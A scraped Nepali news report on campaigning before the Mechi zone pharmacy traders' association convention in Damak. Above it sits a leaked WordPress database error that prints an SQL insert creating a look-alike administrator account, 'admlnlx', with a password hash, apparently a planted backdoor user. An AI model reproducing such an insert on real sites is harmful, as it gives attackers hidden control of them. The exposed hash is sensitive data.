WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BE9Kbc3EDAaGjjGEm3JlYuG0M0h10P.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-01 13:45:01', '', 'admlnlx', 'admlnlx')
विर्तामोड, माघ १५ –
नेपाल औषधि व्यवसायी सङ्घ मेची अञ्चलको आसन्न अधिवेशनसँगै यहाँ चुनावी सरगर्मी बढेको छ ।
फागुन ७ गते झापाको दमकमा सङ्घको ११ आँैं अधिवेशन हुने निश्चित भएपछि औषधि व्यवसायीबीच चुनावी चर्चा सुरु भएको हो ।
चुनावी चर्चासँगै व्यवसायीले आ–आफ्नो तरिकाबाट उम्मेदवारी घोषणा गर्न थालेका छन् । विर्तामोडका औषधि व्यवसायी नरेन्द्रप्रसाद बरालले अध्यक्ष पदमा उम्मेदवारी दिने घोषणा गर्नुभएको छ । उहाँले औषधि व्यवसायीको हकहितका लागि आफू्ले उम्मेद्वारी दिन लागेको बताउनुभयो । बराल विर्तामोडका ओसिएन फर्माका सञ्चालक हुनुहुन्छ ।
सङ्घको अधिवेशनले १७ सदस्यीय नयाँ अञ्चल समिति चयन गर्नेछ । नयाँ समितिको कार्यकाल तीन वर्षको हुनेछ । मेची अञ्चलभर चारसय ५० औषधि व्यवसायी रहेका छन् । त्यसमध्ये चारसय २२ जना सङ्घमा आवद्ध रहेको जनाइएको छ । रासस